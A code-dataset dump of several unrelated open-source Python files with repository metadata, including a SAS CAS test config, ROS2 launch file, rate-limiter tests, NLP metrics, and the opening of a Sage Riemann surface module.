] | 9 | 2019-01-24T14:52:33.000Z | 2022-03-16T14:14:35.000Z | tests/swat_config.py | jld23/sasoptpy | f96911f04d6c0c01fce902f1f995935583df69a8 | [
"Apache-2.0"
] | 12 | 2017-12-22T19:37:16.000Z | 2021-07-30T21:04:03.000Z |
import os
from swat import CAS
import warnings
def create_cas_connection():
cas_args = {'host': os.environ.get('CASHOST'),
'port': int(os.environ.get('CASPORT'))}
authinfo = os.environ.get('AUTHINFO', None)
if authinfo:
cas_args['authinfo'] = authinfo
return CAS(**cas_args)
username = os.environ.get('CASUSERNAME', None)
if username:
cas_args['username'] = username
cas_args['password'] = os.environ.get('CASPASSWORD', None)
return CAS(**cas_args)
warnings.warn('CAS connection cannot be established.', RuntimeWarning)
return None
| 28.181818 | 74 | 0.645161 |
5975cd6fbf0a7ec1c7ad36d0a67bce3fe1ecdabc | 1,083 | py | Python | habitat_baselines/rl/hrl/skills/wait.py | Jiayuan-Gu/habitat-lab | 5ce36a6c6502fe8e86d6732ba8bab9a5db471574 | [
"MIT"
] | null | null | null | habitat_baselines/rl/hrl/skills/wait.py | Jiayuan-Gu/habitat-lab | 5ce36a6c6502fe8e86d6732ba8bab9a5db471574 | [
"MIT"
] | null | null | null | habitat_baselines/rl/hrl/skills/wait.py | Jiayuan-Gu/habitat-lab | 5ce36a6c6502fe8e86d6732ba8bab9a5db471574 | [
"MIT"
] | null | null | null | from typing import Any
import gym.spaces as spaces
import torch
from habitat_baselines.rl.hrl.skills.skill import SkillPolicy
class WaitSkillPolicy(SkillPolicy):
def __init__(
self,
config,
action_space: spaces.Space,
batch_size,
):
super().__init__(config, action_space, batch_size, True)
self._wait_time = -1
def _parse_skill_arg(self, skill_arg: str) -> Any:
self._wait_time = int(skill_arg[0])
self._internal_log(f"Requested wait time {self._wait_time}")
def _is_skill_done(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
) -> torch.BoolTensor:
assert self._wait_time > 0
return self._cur_skill_step >= self._wait_time
def _internal_act(
self,
observations,
rnn_hidden_states,
prev_actions,
masks,
cur_batch_idx,
deterministic=False,
):
action = torch.zeros(prev_actions.shape, device=prev_actions.device)
return action, rnn_hidden_states
| 24.613636 | 76 | 0.638042 |
5022daad2d61e345ed4f186a89da55d635840af0 | 142 | py | Python | week6-python/hello/hello.py | fahofmeister/cs50x | 022eefa9f25958b115fc2d2a50d34aacbc2b62a5 | [
"MIT"
] | null | null | null | week6-python/hello/hello.py | fahofmeister/cs50x | 022eefa9f25958b115fc2d2a50d34aacbc2b62a5 | [
"MIT"
] | null | null | null | week6-python/hello/hello.py | fahofmeister/cs50x | 022eefa9f25958b115fc2d2a50d34aacbc2b62a5 | [
"MIT"
] | null | null | null | from cs50 import get_string
# This program asks the user name and greets him
name = get_string("What's your name?\n")
print(f"hello, {name}") | 28.4 | 48 | 0.739437 |
3fbbd313309a56c8caaaf05f666e4fd2b5adf402 | 4,275 | py | Python | smacc2_sm_reference_library/sm_aws_warehouse_navigation/launch/localization_launch.py | reelrbtx/SMACC2 | ac61cb1599f215fd9f0927247596796fc53f82bf | [
"Apache-2.0"
] | 48 | 2021-05-28T01:33:20.000Z | 2022-03-24T03:16:03.000Z | smacc2_sm_reference_library/sm_aws_warehouse_navigation/launch/localization_launch.py | reelrbtx/SMACC2 | ac61cb1599f215fd9f0927247596796fc53f82bf | [
"Apache-2.0"
] | 75 | 2021-06-25T22:11:21.000Z | 2022-03-30T13:05:38.000Z | smacc2_sm_reference_library/sm_aws_warehouse_navigation/launch/localization_launch.py | reelrbtx/SMACC2 | ac61cb1599f215fd9f0927247596796fc53f82bf | [
"Apache-2.0"
] | 14 | 2021-06-16T12:10:57.000Z | 2022-03-01T18:23:27.000Z | # Copyright (c) 2018 Intel Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from ament_index_python.packages import get_package_share_directory
from launch import LaunchDescription
from launch.actions import DeclareLaunchArgument, SetEnvironmentVariable
from launch.substitutions import LaunchConfiguration
from launch_ros.actions import Node
from nav2_common.launch import RewrittenYaml
def generate_launch_description():
# Get the launch directory
bringup_dir = get_package_share_directory("nav2_bringup")
namespace = LaunchConfiguration("namespace")
map_yaml_file = LaunchConfiguration("map")
use_sim_time = LaunchConfiguration("use_sim_time")
autostart = LaunchConfiguration("autostart")
params_file = LaunchConfiguration("params_file")
lifecycle_nodes = ["map_server", "amcl"]
# Map fully qualified names to relative ones so the node's namespace can be prepended.
# In case of the transforms (tf), currently, there doesn't seem to be a better alternative
# https://github.com/ros/geometry2/issues/32
# https://github.com/ros/robot_state_publisher/pull/30
# TODO(orduno) Substitute with `PushNodeRemapping`
# https://github.com/ros2/launch_ros/issues/56
remappings = [("/tf", "tf"), ("/tf_static", "tf_static")]
# Create our own temporary YAML files that include substitutions
param_substitutions = {"use_sim_time": use_sim_time, "yaml_filename": map_yaml_file}
configured_params = RewrittenYaml(
source_file=params_file,
root_key=namespace,
param_rewrites=param_substitutions,
convert_types=True,
)
return LaunchDescription(
[
# Set env var to print messages to stdout immediately
SetEnvironmentVariable("RCUTILS_LOGGING_BUFFERED_STREAM", "1"),
DeclareLaunchArgument(
"namespace", default_value="", description="Top-level namespace"
),
DeclareLaunchArgument(
"map",
default_value=os.path.join(bringup_dir, "maps", "turtlebot3_world.yaml"),
description="Full path to map yaml file to load",
),
DeclareLaunchArgument(
"use_sim_time",
default_value="false",
description="Use simulation (Gazebo) clock if true",
),
DeclareLaunchArgument(
"autostart",
default_value="true",
description="Automatically startup the nav2 stack",
),
DeclareLaunchArgument(
"params_file",
default_value=os.path.join(bringup_dir, "params", "nav2_params.yaml"),
description="Full path to the ROS2 parameters file to use",
),
Node(
package="nav2_map_server",
executable="map_server",
name="map_server",
output="screen",
parameters=[configured_params],
remappings=remappings,
),
Node(
package="nav2_amcl",
executable="amcl",
name="amcl",
output="screen",
parameters=[configured_params],
remappings=remappings,
),
Node(
package="nav2_lifecycle_manager",
executable="lifecycle_manager",
name="lifecycle_manager_localization",
output="screen",
parameters=[
{"use_sim_time": use_sim_time},
{"autostart": autostart},
{"node_names": lifecycle_nodes},
],
),
]
)
| 38.513514 | 94 | 0.621053 |
7c54f82c2c5891c4e2b9943c6e8c6350b8135c48 | 1,884 | py | Python | linkmap.py | iwanglian/tools | a0f6dec83421b33dcddb2064c0babdb292973feb | [
"MIT"
] | null | null | null | linkmap.py | iwanglian/tools | a0f6dec83421b33dcddb2064c0babdb292973feb | [
"MIT"
] | null | null | null | linkmap.py | iwanglian/tools | a0f6dec83421b33dcddb2064c0babdb292973feb | [
"MIT"
] | null | null | null | if __name__ == '__main__':
import sys, os
filenameArray = []
no_dir = 1
if len(sys.argv) > 1:
# walk around
no_dir = 0
rootDir = sys.argv[2]
for root, dirs, files in os.walk(rootDir):
for filespath in files:
if filespath.endswith(".m") or filespath.endswith(".mm") or filespath.endswith(".cpp"):
# print(filespath)
file_parts = os.path.splitext(filespath)
filenameArray.append(file_parts[0])
parseState = 0
oDict = {}
sizeDict = {}
for line in open(sys.argv[1]):
if line.startswith(r"# Object files:"):
parseState = 1
elif line.startswith(r"# Address Size File Name"):
parseState = 2
elif line.startswith("#"):
parseState = 0
elif parseState == 1:
parts = line.split("] /")
if len(parts) > 1:
filename = os.path.basename(parts[1])
file_parts = os.path.splitext(filename)
if no_dir == 1:
oDict[parts[0]] = file_parts[0]
else:
if file_parts[0] in filenameArray:
oDict[parts[0]] = file_parts[0]
elif parseState == 2:
parts = line.split("\t")
if len(parts) < 3:
continue
fileno = parts[2].split("] ")[0]
if oDict.has_key(fileno):
filename = oDict[fileno]
size = int(parts[1], 0)
if sizeDict.has_key(filename):
sizeDict[filename] += size
else:
sizeDict[filename] = size
import operator
sorted_sizeDict = sorted(sizeDict.items(), key=operator.itemgetter(1), reverse=True)
for item in sorted_sizeDict:
print item
| 33.642857 | 103 | 0.495754 |
aab4290fec3dda7af3c2b2e7f6a1fc3b083b1273 | 902 | py | Python | app/main/models/price.py | kenneth-kip/Kilimo-Smart-API | c0b281f4a5e61731f544e3ed27eeca9ee7615339 | [
"MIT"
] | null | null | null | app/main/models/price.py | kenneth-kip/Kilimo-Smart-API | c0b281f4a5e61731f544e3ed27eeca9ee7615339 | [
"MIT"
] | 2 | 2021-03-31T19:11:06.000Z | 2021-12-13T19:58:50.000Z | app/main/models/price.py | kenneth-kip/Kilimo-Smart-API | c0b281f4a5e61731f544e3ed27eeca9ee7615339 | [
"MIT"
] | null | null | null | """ Price Model """
from datetime import date
from .. import db
class Price(db.Model):
""" Price's Model"""
__tablename__ = "Price"
id = db.Column(db.Integer, primary_key=True, autoincrement=True)
low_price = db.Column(db.Numeric(scale=2), nullable=False)
high_price = db.Column(db.Numeric(scale=2), nullable=False)
quantity = db.Column(db.Integer, nullable=False, default=0)
date = db.Column(db.Date, nullable=False, default=date.today)
region_id = db.Column(db.Integer, db.ForeignKey('Region.id'), nullable=False)
region = db.relationship('Region', backref=db.backref('Region', lazy=True))
produce_id = db.Column(db.Integer, db.ForeignKey('Produce.id'), nullable=False)
produce = db.relationship('Produce', backref=db.backref('Produce', lazy=True))
def __repr__(self):
return f'<Price {self.produce.name}-{self.region.name}-{self.date} >'
| 39.217391 | 83 | 0.691796 |
ff1c5125869b2c3374e88bada1654a11dbbe0925 | 852 | py | Python | Chinese_remainder_theorem.py | kuzuri-03/Cryptography_Ciphers | e49bb346ea5651bf93530badb4e708a06c14eec7 | [
"MIT"
] | null | null | null | Chinese_remainder_theorem.py | kuzuri-03/Cryptography_Ciphers | e49bb346ea5651bf93530badb4e708a06c14eec7 | [
"MIT"
] | null | null | null | Chinese_remainder_theorem.py | kuzuri-03/Cryptography_Ciphers | e49bb346ea5651bf93530badb4e708a06c14eec7 | [
"MIT"
] | null | null | null | # modular inverse
def inverse_mod(a,b):
x = a
y = b
oldolds = 1
olds = 0
oldoldt = 0
oldt = 1
while y != 0:
q = x // y
r = x % y
x = y
y = r
s = oldolds - q * olds
t = oldoldt - q * oldt
oldolds = olds
oldoldt = oldt
olds = s
oldt = t
return oldolds
# The chinese remainder theorem
def chinese_remainder_theorem(mn,an):
m = 1
Mn = []
yn = []
for k in range(0, len(mn)):
m = m * mn[k]
for k in range (0, len(mn)):
Mk = m / mn[k]
Mn.append(Mk)
yk = inverse_mod(Mn[k],mn[k]) % mn[k]
yn.append(yk)
x = 0
for k in range (0, len(yn)):
x = x + an[k] * Mn[k] * yn[k]
while x >= m:
x = x - m
return x
# test
chinese_remainder_theorem([1,2],[4,3]) | 20.780488 | 45 | 0.444836 |
32c4526838735a013a37354edf4acb9b040cb0d5 | 1,735 | py | Python | guaCaster.py | IanDCarroll/guaCaster | fae81b2707492339091a3eb0e638ef396588c29e | [
"MIT"
] | 3 | 2017-12-03T20:14:25.000Z | 2019-01-22T05:05:02.000Z | guaCaster.py | IanDCarroll/guaCaster | fae81b2707492339091a3eb0e638ef396588c29e | [
"MIT"
] | null | null | null | guaCaster.py | IanDCarroll/guaCaster | fae81b2707492339091a3eb0e638ef396588c29e | [
"MIT"
] | null | null | null | import wtnDice
import guaNames
def castYao():
#todo adjust tp call a wtnDice.di['totl'] getter method
cast = wtnDice.roll(3,2,{},[])
return cast
def idGua(guaCode):
jiuGua = 0 #Old situation
yiGua = 0 #The situation which affects the change
xinGua = 0 #New situation
for i in range(0,6): #Upper Trigram
if guaCode[i] == 3: #Yang changes to Yin
jiuGua += 9 * (10 ** i) #Yang
yiGua += 9 * (10 ** i) #Active
xinGua += 6 * (10 ** i) #Yin
elif guaCode[i] == 4: #Yin stays yin
jiuGua += 6 * (10 ** i) #Yin
yiGua += 6 * (10 ** i) #Passive
xinGua += 6 * (10 ** i) #Yin
elif guaCode[i] == 5: #Yang stays Yang
jiuGua += 9 * (10 ** i) #Yang
yiGua += 6 * (10 ** i) #Passive
xinGua += 9 * (10 ** i) #Yang
else: #guaCode[i] ==6: #Yin changes to Yang
jiuGua += 6 * (10 ** i) #Yin
yiGua += 9 * (10 ** i) #Active
xinGua += 9 * (10 ** i) #Yang
a = guaNames.nameGua(jiuGua)
b = guaNames.nameGua(yiGua)
c = guaNames.nameGua(xinGua)
return 'Jiu Gua: %s\nYi Gua: %s\nXin Gua: %s' % (a,b,c)
def castGua():
guaImag = []
guaCode = []
for i in range(0,6):
guaCode.append(castYao())
guaCode.reverse() #gua are built from the bottom up
for j in range(0,6):
if guaCode[j] == 3: #coins tossed are 1,1,1
guaImag.append('_________ > Jiu > ___ ___')
elif guaCode[j] == 4: #coins tossed are 1,2,1
guaImag.append('___ ___ | Xin | ___ ___')
elif guaCode[j] == 5: #coins tossed are 2,1,2
guaImag.append('_________ | Xin | _________')
else: #if guaCode[j] == 6: #coins tossed are 2,2,2
guaImag.append('___ ___ > Jiu > _________')
print guaImag[j]
return idGua(guaCode)
def main():
print castGua()
if __name__=='__main__':
main()
| 26.692308 | 57 | 0.588473 |
467c1da5b719d25c6e853475c1c02d8fe2e4583c | 1,465 | py | Python | tests/dao/redis/test_sliding_window_rate_limiter.py | 4heck/ru102py | 1961965f283b014b46e9618464ec1df6d9e6b03b | [
"MIT"
] | null | null | null | tests/dao/redis/test_sliding_window_rate_limiter.py | 4heck/ru102py | 1961965f283b014b46e9618464ec1df6d9e6b03b | [
"MIT"
] | null | null | null | tests/dao/redis/test_sliding_window_rate_limiter.py | 4heck/ru102py | 1961965f283b014b46e9618464ec1df6d9e6b03b | [
"MIT"
] | null | null | null | import time
import pytest
from redisolar.dao.base import RateLimitExceededException
from redisolar.dao.redis.sliding_window_rate_limiter import SlidingWindowRateLimiter
TEN_SECONDS = 10 * 1000
# Challenge #7
# @pytest.mark.skip("Remove for challenge #7")
def test_within_limit_inside_window(redis, key_schema):
exception_count = 0
limiter = SlidingWindowRateLimiter(TEN_SECONDS, 10, redis, key_schema=key_schema)
for _ in range(10):
try:
limiter.hit("foo")
except RateLimitExceededException:
exception_count += 1
assert exception_count == 0
# @pytest.mark.skip("Remove for challenge #7")
def test_exceeds_limit_inside_window(redis, key_schema):
exception_count = 0
limiter = SlidingWindowRateLimiter(TEN_SECONDS, 10, redis, key_schema=key_schema)
for _ in range(12):
try:
limiter.hit("foo")
except RateLimitExceededException:
exception_count += 1
assert exception_count == 2
# @pytest.mark.skip("Remove for challenge #7")
def test_exceeds_limit_outside_window(redis, key_schema):
raised = False
limiter = SlidingWindowRateLimiter(100, 10, redis, key_schema=key_schema)
for _ in range(10):
limiter.hit("foo")
# Sleep to let the window move and thus allow an 11th request.
time.sleep(1)
try:
limiter.hit("foo")
except RateLimitExceededException:
raised = True
assert raised is False
| 26.160714 | 85 | 0.702389 |
784e56e7a3eb629a13274844419291d632014029 | 1,238 | py | Python | prediction/app.py | PauBatlle/NewsMultirank | 30f2f050bafdab1bf3902deac17c18ad5af648c0 | [
"Apache-2.0"
] | null | null | null | prediction/app.py | PauBatlle/NewsMultirank | 30f2f050bafdab1bf3902deac17c18ad5af648c0 | [
"Apache-2.0"
] | null | null | null | prediction/app.py | PauBatlle/NewsMultirank | 30f2f050bafdab1bf3902deac17c18ad5af648c0 | [
"Apache-2.0"
] | 1 | 2018-02-24T04:34:27.000Z | 2018-02-24T04:34:27.000Z | from flask import Flask, request, Response
from flask_cors import CORS
from predict import doPredict
import logging
from logging.handlers import RotatingFileHandler
from IPython import embed
app = Flask(__name__)
CORS(app)
@app.route('/', methods=['POST'])
def main():
aux = request.values
#embed()
print(len(request.values))
title = aux.to_dict(flat = False)['title'][0]
body = aux.to_dict(flat = False)['body'][0]
s = body.find(title)
if s == -1:
body = "*"
else:
body = body[s:]
#["Agrees", "Disagrees", "Discusses", "Unrelated"]
print("Title of the new: ", title)
#title = request.args['title']
#body = request.args.post('body')
result = doPredict(title, body)
print("Probabilities: ", result[0])
print("Most probable category: ", result[1])
print("Clickbaity title? : ", result[2])
resp = Response(result, status=200, mimetype='application/json')
return "resp"
#logger.info('This error output', file=sys.stderr)
#logger.info(title, file=sys.stdout)
#logger.info("Hi", file=sys.stdout)
#return print("Hello")
if __name__ == '__main__':
app.run(debug=True, host='0.0.0.0')
logging.basicConfig(format='%(asctime)s %(module)s %(message)s', level=logging.INFO)
logger = logging.getLogger(__name__)
| 25.791667 | 85 | 0.692246 |
d88c79b5dc80e2ef528359116f99c915c4391a23 | 551 | py | Python | QucikSort_first.py | JhoLee/Algorithm | ae3db61ee8974e54ff4d6a15d0b6822353392339 | [
"Apache-2.0"
] | null | null | null | QucikSort_first.py | JhoLee/Algorithm | ae3db61ee8974e54ff4d6a15d0b6822353392339 | [
"Apache-2.0"
] | null | null | null | QucikSort_first.py | JhoLee/Algorithm | ae3db61ee8974e54ff4d6a15d0b6822353392339 | [
"Apache-2.0"
] | null | null | null | """
김용승 교수님의 알고리즘을 그대로 구현
"""
def QuickSort(R, m, n):
if(m < n):
i = m
j = n + 1
while(1):
while(i < len(R) and R[i]>=R[m]):
i =i + 1
while(j < len(R) and R[j]<=R[m]):
j = j - 1
if (i < j):
R[i], R[j] = R[j], R[i]
else:
break
R[m], R[j] = R[j], R[m]
QuickSort(R, m, j-1)
QuickSort(R, j+1, n)
return R
R = [2, 4, 2, 1, 4]
print(R)
print(QuickSort(R, 0, len(R))) | 19 | 46 | 0.328494 |
18b0786e4c0aa62029941c668570d0479d971bee | 181 | py | Python | dispike/errors/warnings.py | mitsuaky/dispike | bd3ffb28fc03307077d647ee233f4f0e5c594434 | [
"MIT"
] | 41 | 2020-12-29T03:07:38.000Z | 2022-01-30T09:05:03.000Z | dispike/errors/warnings.py | mitsuaky/dispike | bd3ffb28fc03307077d647ee233f4f0e5c594434 | [
"MIT"
] | 66 | 2020-12-28T08:04:27.000Z | 2021-11-04T09:12:54.000Z | dispike/errors/warnings.py | mitsuaky/dispike | bd3ffb28fc03307077d647ee233f4f0e5c594434 | [
"MIT"
] | 11 | 2021-01-21T22:36:34.000Z | 2021-11-04T07:23:30.000Z | class InsecureBindingWithCustomHostWarning(UserWarning):
"""
This warning is issued when a user binds to a ip address other than 127.0.0.1
ip address.
"""
pass
| 22.625 | 81 | 0.690608 |
24143f5a3bbe148a5db33d504fb888c9c6f86d54 | 224 | py | Python | ashwintest/test_emuegde.py | akrishna1995/emuedge | d33845107be3c9bbfcaf030df0a989e9d4972743 | [
"MIT"
] | null | null | null | ashwintest/test_emuegde.py | akrishna1995/emuedge | d33845107be3c9bbfcaf030df0a989e9d4972743 | [
"MIT"
] | null | null | null | ashwintest/test_emuegde.py | akrishna1995/emuedge | d33845107be3c9bbfcaf030df0a989e9d4972743 | [
"MIT"
] | null | null | null | #! /usr/bin/python
import sys
import os
from .. import xen
def main():
print "Hello World"
xnet=xen.test_topo(topo='exps/twoway_simple.topo', start=True, nolog=False)
if __name__ == "__main__" :
sys.exit(main())
| 18.666667 | 78 | 0.683036 |
8c4c73d2194874a13185fa478372838e4d8eb696 | 4,415 | py | Python | tplinker/metrics.py | luozhouyang/TPLinker | 3cacf48901f73a4d4e90ed51d8d5bbf8aecb5a02 | [
"Apache-2.0"
] | 8 | 2021-05-03T02:06:05.000Z | 2022-03-25T09:35:32.000Z | tplinker/metrics.py | anatanick/TPLinker | 3cacf48901f73a4d4e90ed51d8d5bbf8aecb5a02 | [
"Apache-2.0"
] | 1 | 2021-05-01T08:03:45.000Z | 2021-05-14T09:39:45.000Z | tplinker/metrics.py | anatanick/TPLinker | 3cacf48901f73a4d4e90ed51d8d5bbf8aecb5a02 | [
"Apache-2.0"
] | 4 | 2021-04-14T19:45:29.000Z | 2022-03-28T01:58:35.000Z | import json
import pytorch_lightning as pl
import torch
from torchmetrics import Metric
from tplinker.tagging_scheme import HandshakingTaggingDecoder, TagMapping
class SampleAccuracy(Metric):
def __init__(self):
super().__init__()
self.add_state('correct', default=torch.tensor(0), dist_reduce_fx='sum')
self.add_state('total', default=torch.tensor(0), dist_reduce_fx='sum')
def update(self, preds, target):
# shape: (batch_size, num_relations, 1+2+...+seq_len)
preds_id = torch.argmax(preds, dim=-1)
# shape: (batch_size, num_relations * (1+2+...+seq_len))
preds_id = preds_id.view(preds_id.size()[0], -1)
# shape: (batch_size, num_relations * (1+2+...+seq_len))
target = target.view(target.size()[0], -1)
# num of correct tags
correct_tags = torch.sum(torch.eq(target, preds_id), dim=1)
# num of correct samples
correct_samples = torch.sum(
torch.eq(correct_tags, torch.ones_like(correct_tags) * target.size()[-1]))
self.correct += correct_samples
self.total += target.size()[0]
def compute(self):
return self.correct / self.total
class _PRF(Metric):
"""Precision, Recall and F1 metric"""
def __init__(self, pattern='only_head_text', epsilon=1e-12):
super().__init__()
self.pattern = pattern
self.epsilon = epsilon
self.add_state('correct', default=torch.tensor(0), dist_reduce_fx='sum')
self.add_state('goldnum', default=torch.tensor(0), dist_reduce_fx='sum')
self.add_state('prednum', default=torch.tensor(0), dist_reduce_fx='sum')
def update(self, pred_relations, gold_relations):
for pred, gold in zip(pred_relations, gold_relations):
pred_set, gold_set = self._parse_relations_set(pred, gold)
for rel in pred_set:
if rel in gold_set:
self.correct += 1
self.prednum += len(pred_set)
self.goldnum += len(gold_set)
# print('metric states: correct={}, prednum={}, goldnum={}'.format(self.correct, self.prednum, self.goldnum))
def _parse_relations_set(self, pred_relations, gold_relations):
if self.pattern == 'whole_span':
gold_set = set(['{}-{}-{}-{}-{}'.format(
rel['subj_tok_span'][0], rel['subj_tok_span'][1], rel['predicate'], rel['obj_tok_span'][0], rel['obj_tok_span'][1]
) for rel in gold_relations])
pred_set = set(['{}-{}-{}-{}-{}'.format(
rel['subj_tok_span'][0], rel['subj_tok_span'][1], rel['predicate'], rel['obj_tok_span'][0], rel['obj_tok_span'][1]
) for rel in pred_relations])
return pred_set, gold_set
if self.pattern == 'whole_text':
gold_set = set([
'{}-{}-{}'.format(rel['subject'], rel['predicate'], rel['object']) for rel in gold_relations
])
pred_set = set([
'{}-{}-{}'.format(rel['subject'], rel['predicate'], rel['object']) for rel in pred_relations
])
return pred_set, gold_set
if self.pattern == 'only_head_index':
gold_set = set([
'{}-{}-{}'.format(rel['subj_tok_span'][0], rel['predicate'], rel['obj_tok_span'][0]) for rel in gold_relations
])
pred_set = set([
'{}-{}-{}'.format(rel['subj_tok_span'][0], rel['predicate'], rel['obj_tok_span'][0]) for rel in pred_relations
])
return pred_set, gold_set
gold_set = set([
'{}-{}-{}'.format(rel['subject'].split(' ')[0], rel['predicate'], rel['object'].split(' ')[0]) for rel in gold_relations
])
pred_set = set([
'{}-{}-{}'.format(rel['subject'].split(' ')[0], rel['predicate'], rel['object'].split(' ')[0]) for rel in pred_relations
])
return pred_set, gold_set
class Precision(_PRF):
def compute(self):
return self.correct / (self.prednum + self.epsilon)
class Recall(_PRF):
def compute(self):
return self.correct / (self.goldnum + self.epsilon)
class F1(_PRF):
def compute(self):
precision = self.correct / (self.prednum + self.epsilon)
recall = self.correct / (self.goldnum + self.epsilon)
f1 = 2.0 * precision * recall / (precision + recall + self.epsilon)
return f1
| 39.419643 | 132 | 0.588675 |
d0975e773b7a5bf7c61638051e6ee01a3d3b8f2b | 89,520 | py | Python | src/sage/schemes/riemann_surfaces/riemann_surface.py | ChamanAgrawal/sage | 5f6d56ba247b352d7d46442e88fa3a027e9f222d | [
"BSL-1.0"
] | 2 | 2019-06-02T03:16:59.000Z | 2019-06-15T10:17:18.000Z | src/sage/schemes/riemann_surfaces/riemann_surface.py | ChamanAgrawal/sage | 5f6d56ba247b352d7d46442e88fa3a027e9f222d | [
"BSL-1.0"
] | null | null | null | src/sage/schemes/riemann_surfaces/riemann_surface.py | ChamanAgrawal/sage | 5f6d56ba247b352d7d46442e88fa3a027e9f222d | [
"BSL-1.0"
] | 1 | 2019-06-02T03:16:55.000Z | 2019-06-02T03:16:55.000Z | r"""
Riemann matrices and endomorphism rings of algebraic Riemann surfaces
This module provides a class, RiemannSurface, to model the Riemann surface
determined by a plane algebraic curve over a subfield of the complex numbers.
A homology basis is derived from the edges of a Voronoi cell decomposition based
on the branch locus. The pull-back of these edges to the Riemann surface
provides a graph on it that contains a homology basis.
The class provides methods for computing the Riemann period matrix of the
surface numerically, using a certified homotopy continuation method due to
[Kr2016].
The class also provides facilities for computing the endomorphism ring of the
period lattice numerically, by determining integer (near) solutions to the
relevant approximate linear equations.
AUTHORS:
- Alexandre Zotine, Nils Bruin (2017-06-10): initial version
- Nils Bruin, Jeroen Sijsling (2018-01-05): algebraization, isomorphisms
EXAMPLES:
We compute the Riemann matrix of a genus 3 curve::
sage: from sage.schemes.riemann_surfaces.riemann_surface import RiemannSurface
sage: R.<x,y>=QQ[]
sage: f=x^4-x^3*y+2*x^3+2*x^2*y+2*x^2-2*x*y^2+4*x*y-y^3+3*y^2+2*y+1
sage: S=RiemannSurface(f,prec=100)
sage: M=S.riemann_matrix()
We test the usual properties, i.e., that the period matrix is symmetric and that
the imaginary part is positive definite::
sage: all(abs(a) < 1e-20 for a in (M-M.T).list())
True
sage: iM = Matrix(RDF,3,3,[a.imag_part() for a in M.list()])
sage: iM.is_positive_definite()
True
We compute the endomorphism ring and check it has `\ZZ`-rank 6::
sage: A=S.endomorphism_basis(80,8)
sage: len(A) == 6
True
In fact it is an order in a number field::
sage: T.<t>=QQ[]
sage: K.<a>=NumberField(t^6 - t^5 + 2*t^4 + 8*t^3 - t^2 - 5*t + 7)
sage: all(len(a.minpoly().roots(K)) == a.minpoly().degree() for a in A)
True
"""
# ****************************************************************************
# Copyright (C) 2017 Alexandre Zotine, Nils Bruin
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 2 of the License, or
# (at your option) any later version.
# https://www.gnu.org/licenses/
# ****************************************************************************
from __future__ import division
from six.moves import range
from scipy.spatial import Voronoi
from sage.arith.misc import GCD, algdep
from sage.arith.srange import srange
from sage.ext.fast_callable import fast_callable
from sage.graphs.graph import Graph
from sage.groups.matrix_gps.finitely_generated import MatrixGroup
from sage.groups.perm_gps.permgroup_named import SymmetricGroup
from sage.matrix.constructor import Matrix, matrix
from sage.matrix.special import block_matrix
from sage.misc.cachefunc import cached_method
from sage.misc.misc_c import prod
from sage.modules.free_module import VectorSpace
from sage.numerical.gauss_legendre import integrate_vector
from sage.rings.complex_field import ComplexField, CDF
from sage.rings.integer_ring import ZZ
from sage.rings.polynomial.polynomial_ring_constructor import PolynomialRing
from sage.rings.qqbar import number_field_elements_from_algebraics
from sage.rings.rational_field import QQ
from sage.rings.real_mpfr import RealField
import sage.libs.mpmath.all as mpall
def voronoi_ghost(cpoints, n=6, CC=CDF):
r"""
Convert a set of complex points to a list of real tuples `(x,y)`, and
appends n points in a big circle around them.
The effect is that, with n >= 3, a Voronoi decomposition will have only
finite cells around the original points. Furthermore, because the extra
points are placed on a circle centered on the average of the given points,
with a radius 3/2 times the largest distance between the center and the
given points, these finite cells form a simply connected region.
INPUT:
- ``cpoints`` -- a list of complex numbers
OUTPUT:
A list of real tuples `(x,y)` consisting of the original points and a set of
points which surround them.
EXAMPLES::
sage: from sage.schemes.riemann_surfaces.riemann_surface import voronoi_ghost
sage: L = [1 + 1*I, 1 - 1*I, -1 + 1*I, -1 - 1*I]
sage: voronoi_ghost(L) # abs tol 1e-6
[(1.0, 1.0),
(1.0, -1.0),
(-1.0, 1.0),
(-1.0, -1.0),
(2.121320343559643, 0.0),
(1.0606601717798216, 1.8371173070873836),
(-1.060660171779821, 1.8371173070873839),
(-2.121320343559643, 2.59786816870648e-16),
(-1.0606601717798223, -1.8371173070873832),
(1.06066017177982, -1.8371173070873845)]
"""
cpoints = [CC(c) for c in cpoints]
average = sum(cpoints)/len(cpoints)
if len(cpoints) == 1:
radius = 1
else:
radius = 3*max(abs(c-average) for c in cpoints)/2
z = CC.zeta(n)
extra_points = [average+radius*z**i for i in range(n)]
return [(c.real_part(),c.imag_part()) for c in cpoints+extra_points]
def bisect(L, t):
r"""
Find position in a sorted list using bisection.
Given a list `L = [(t_0,...),(t_1,...),...(t_n,...)]` with increasing `t_i`,
find the index i such that `t_i <= t < t_{i+1}` using bisection. The rest of
the tuple is available for whatever use required.
INPUT:
- ``L`` -- A list of tuples such that the first term of each tuple is a real
number between 0 and 1. These real numbers must be increasing.
- ``t`` -- A real number between `t_0` and `t_n`.
OUTPUT:
An integer i, giving the position in L where t would be in
EXAMPLES:
Form a list of the desired form, and pick a real number between 0 and 1::
sage: from sage.schemes.riemann_surfaces.riemann_surface import bisect
sage: L = [(0.0, 'a'), (0.3, 'b'), (0.7, 'c'), (0.8, 'd'), (0.9, 'e'), (1.0, 'f')]
sage: t = 0.5
sage: bisect(L,t)
1
Another example which demonstrates that if t is equal to one of the t_i, it
returns that index::
sage: L = [(0.0, 'a'), (0.1, 'b'), (0.45, 'c'), (0.5, 'd'), (0.65, 'e'), (1.0, 'f')]
sage: t = 0.5
sage: bisect(L,t)
3
"""
# Defining starting indices for the loop.
min = 0
max = len(L) - 1
# If the input t is not between 0 and 1, raise an error.
if t < L[min][0] or t > L[max][0]:
raise ValueError("value for t out of range")
# Main loop.
while (min < max-1):
# Bisect.
mid = (max+min)//2
# If it's equal, return the index we bisected to.
if t == L[mid][0]:
return mid
# If it's smaller, then we're on the left side.
elif t < L[mid][0]:
max = mid
# Otherwise we're on the right side.
else:
min = mid
# Once the loop terminates, we return what the indices converged to.
return min
def numerical_inverse(C):
"""
Compute numerical inverse of a matrix via LU decomposition
INPUT:
- ``C`` -- A real or complex invertible square matrix
